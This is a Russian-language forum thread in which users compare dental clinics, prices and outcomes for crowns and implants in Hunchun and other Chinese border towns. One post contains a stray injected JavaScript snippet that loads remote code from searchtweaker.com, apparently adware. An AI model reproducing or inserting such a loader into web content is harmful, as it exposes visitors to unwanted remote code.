Лечение зубов в Хуньчуне

Страницы: 1 2 След.
RSS
Лечение зубов в Хуньчуне, Стоматологические клиники в Хуньчуне, протезирование и имплантация зубов. Отзывы о клиниках и сервисе. Стоимость стоматологических услуг в Хуньчуне.
 
Кто лечил зубы в Хуньчуне? Подскажите хорошую стоматологическую клинику пожалуйста...
 
Чтот не доверяю я китайским стоматологам. Тут в России чтобы коронки из металлокерамики поставить надо сходить на кучу примерок коронок, а сделать челюсть за два дня мне кажется это совсем нереально. Надо ведь подготовить полностью зубы, пролечить их, спилить лишнее а потом уже только дело дойдет до примерки коронок. И это явно не несколько дней. Может кто опытный расскажет что-нибудь?
 
в Дентал,  моя мама зубы ставила, всю челюсть, пошел 3-ий год, все стоит ТТТ
 
в хуньчуне ставят коронки на здоровые или вылеченные зубы. если зубы больные, то отказываются. Но некоторые несознательные россияне настаивают на установке протезов на больные зубы, им конечно делают, но не дают гарантии. Результат - по прошествии некоторого времени время, деньги и страдания умножаются многократно уже в россии. Плюс много слов о поганой китайской медицине
 
Плохие и хорошие клиники есть везьде. Я знаю много клиник во Владивостоке, где плохо работают и только занимаются зарабатыванием денег. И поэтому говорить однозначно, что в Китае плохо лечат и протезируют зубы нельзя. Кто к кому попадет. Поэтому мнения разные. Моему мужу 4 года назад протезировали в клинике "Семья". Все хорошо. Раз в полгода показываемся на осмотр и чистку. Причем чистка сейчас бесплатна. У него есть карточка, где отмечают прием врача. При первом приеме сразу предупредили, что можно сделать коронки дешевле, но качество тогда будет хуже. На тот момент стоимость была 150ю за зуб. И чтобы мы не говорили, а технологии в Китае лучше.   Наша семья довольна.
 
Цитата
dghoni пишет:
Я тоже согласен с предыдущим высказыванием, самому делали протезирование в Китае, правда в г.Хэйхэ.
Так что всё в порядке, можете почитать здесь: http://dvmeha.ru/turizm/ozdorovitelnyj-tur/
Хорошая реклама, только не расписано чьего производства керамика, весьма большой разброс цен на производителя. Я своей жене,детям и друзьям обеспечиваю лечение зубов примерно по тем-же ценам в Хуньчуне в стоматологии с которой у меня договор. Конечно из Благовещенска в Хуньчунь ехать далеко, но и из Владивостока в Хэйхэ не на много ближе. Особенно мне понравилась карта зубов, без обид, только я представил себя с ноутом и кучей зеркал! Правда есть нюанс - alex71 пишет что в "семье" и за 150ю можно да еще и чистка, как я понимаю от зубного камня бесплатна, если это реально и с хорошим качеством переметнусь туда На днях заеду в "семью" узнаю что почем сообщу результат
http://visitchina.ru/forum/user/420/
 
 150ю - это цена на то время, т.е. 4 года назад! А сейчас т.к. мы являемся пациентами клиники, то чистка бесплатно!
 
Ааа, вот как, не мог предположить что за 4 года цены так изменились, я уже надежду имел. У меня договор с китайцами - кого привожу, тому офигенная скидка, а для меня почти как для туриста, кто делал тот знает -400ю за штуку белозубой улыбки корейской керамики. Пробовал заходить в другие клиники, меньше чем за 350ю не соглашаются, пришлось отказаться. Насчет чистки - один раз делал, как в пыточной, знаю что нужно иногда делать но больше не пойду, даже бесплатно. С уважением chmed2012
 
очень советую всем кто собрался протезировать  зубы в Китае- обязательно пролечите их в России !
И желательно так же обточить, а в Китай ехать уже с готовыми для протезирования зубами.
Я протезировала зубы в Удалянчи в санатории , за 1 день сняли старые коронки , обточили зубы (кот. без коронок), и вставили штифты. 3 года не было никаких проблем, а потом , когда заболела челюсть, у нас в России сделали снимки зубов, так оказалось столько косяков! Штифты ставили не в зубные каналы, а как попало.
Сейчас предлагают зубы с неправильными штифтами удалить, т.к. у нас на них отказываются ставить коронки. Вот тебе и лечение за 1 день!  Будьте внимательны к своему здоровью, лучше не рискуйте.
В 2012г. протезировала 3 зуба в Хунь Чуне клиника Лилия. Через 1,5 года вставкой натерла десну до пролежня. Лучше лечить у нас, но цены! С меня попросили за 3 зуба 120 тыс рублей и никакой гарантии.
Вот и думай , что лучше?
 
Людмила Габитова пролечить зубы абсолютно согласна. Но вот обтачивать то как? Вы же не знаете какие будут протезы. Слепки делаются на месте. Езжайте снова в Китай. И переделывайте Ваши зубы. В России не любят переделывать Китайские. Еще и страшилок расскажут, что бы побольше денег у Вас взять.
 
Цитата
Людмила Габитова пишет:
очень советую всем кто собрался протезировать зубы в Китае- обязательно пролечите их в России !
И желательно так же обточить, а в Китай ехать уже с готовыми для протезирования зубами.
Я протезировала зубы в Удалянчи в санатории , за 1 день сняли старые коронки , обточили зубы (кот. без коронок), и вставили штифты. 3 года не было никаких проблем, а потом , когда заболела челюсть, у нас в России сделали снимки зубов, так оказалось столько косяков! Штифты ставили не в зубные каналы, а как попало.
Сейчас предлагают зубы с неправильными штифтами удалить, т.к. у нас на них отказываются ставить коронки. Вот тебе и лечение за 1 день! Будьте внимательны к своему здоровью, лучше не рискуйте.
В 2012г. протезировала 3 зуба в Хунь Чуне клиника Лилия. Через 1,5 года вставкой натерла десну до пролежня. Лучше лечить у нас, но цены! С меня попросили за 3 зуба 120 тыс рублей и никакой гарантии.
Вот и думай , что лучше?
В самом ХЧ ..в клиниках врачи сами говорят чтоб лечили в России.НУ а где протезироваться -это вам решать!!!....за три зуба 120 тысяч!!!это где лечат так??? в Соне плюс?.это космические цены!!!!
.во Владивостоке могу посоветовать клинику АДОНИС  на Фирсова..сам там лечился и протезировался..и мои знакомые там же лечились..делают тоже самое что и в дорогих клиниках..цены умеренные...
 
dghoni после удаления зуба, надо недели 3, что бы точно лунка зажила.
 
Людмила  Габитова.Вы Что-то попутали.120000 за три зуба ( я не ошибся?) это бред си.... Ко.... Не в одной клинике таких денег взять не могут.Я думаю,что Вы либо хотите убрать конкурента,либо последняя на этом свете ид.....,так как любой другой на Вашем месте встал и ушёл бы.
 
Знакомые говорили, что делали импланты в Китае (тоже приграничье - Хуньчунь или Янцзы). Судя по высказанному в этой ветке, это физически невозможно. Кто прав? Ну и 120 000 за 3 зуба - я слышал про 40-60 тыс. за 1 имплант в клинике во Владивостоке, так что похоже на правду. Дешевле ли в Китае? И если да, то насколько качественно там делают?
Изменено: sparrow - 16.03.2013 15:33:03
 
Интересно, а насколько качественнее делают зубы в россии, не, ну то что российские стоматологи хают китайских коллег, часто слышу, Но лучше, потому что дороже - как-то смешно звучит. В общем бизнесмены в белых халатах лукавят, но иногда не без оснований. Что и ХЧ касается, но полагаю в нареканиях на китайскую стоматологию во многом виноваты и сами пациенты, недавно наблюдал как дама настаивала на протезировании на не пролеченные зубы, ей конечно сделали, но не дали гарантий, что она через некоторое время скажет, что плохая работа? Да и клиник в ХЧ хватает где считают, что русские не всегда приезжают для исполнения гарантий. Найдите для себя хорошую клинику, может и не с самым красивым фасадом, хотя бы по отзывам пациентов, сделайте там для начала что то безопасное и недорогое, хотя бы чистку, потом можно и что то посерьезней сделать, вроде протезирования. Для себя такую нашел, чего и вам желаю. Еще хотелось бы заметить что пролечить зубы можно и в китае, но тогда получается две поездки, не знаю насколько это выгодно с учетом путевки


(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Изменено: chmed2012 - 19.03.2013 00:42:51
 
Так все же возможна иплантация зубов в хуньчуне? Кто нибудь устанавливал, как цены и качество? У меня такая ситуация что в двух клиниках владивостока сказали что надо их ставить взамен моста (простоял 12 лет мета.керамика - под ним обломились зубы). Цена вопроса 30 т.р за единицу под "ключ", а надо как минимум 4 ед. ну и скорее всего+ лечение. Я понимаю что за один прием в китае это сделать не удастся, но если процентов на40% будет дешевле, то можно и 2 - 3 раза съездить. Если кто в курсе отпишитесь... плиз
 
да и еще. это какое то время придеться без зубов ходить? В моем случае это передние верхние. Как то не очень улыбается
Изменено: Александр Корниенко - 24.03.2013 08:35:03
 
кто-нибудь был в больнице "Евроазия"? Моей маме порекомендовали эту больницу, хотелось бы послушать ещё отзывы о ней
 
Цитата
yuliya пишет:
кто-нибудь был в больнице "Евроазия"? Моей маме порекомендовали эту больницу, хотелось бы послушать ещё отзывы о ней
Если  судить по красивости фасада, то наверное одна из лучших стоматологий ХЧ(пока фасад новый), а по качеству услуг и ценовой политике - обычная маленькая клиника для русских
 
Всем привет!Протезировал зубы в Хунь-Чуне по совету знакомых клиника не плохая,но скажу одно, особо-то не церимонятся с табой как у нас принято,раз два и 14 зубов за 3 дня поставили,10 металлокерамики,+бюгельный мост из пластмасса исползуют мотериал Я,понии,Америки,Кореи,за все-про все 35000р.+5000 путевка.Могу подсказать клиника так и называется Стоматология и ортодонтия (Хунь Чунь) возле ресторана Милана телефон:7508100,7578833,7528210,FAX;7508100.
Страницы: 1 2 След.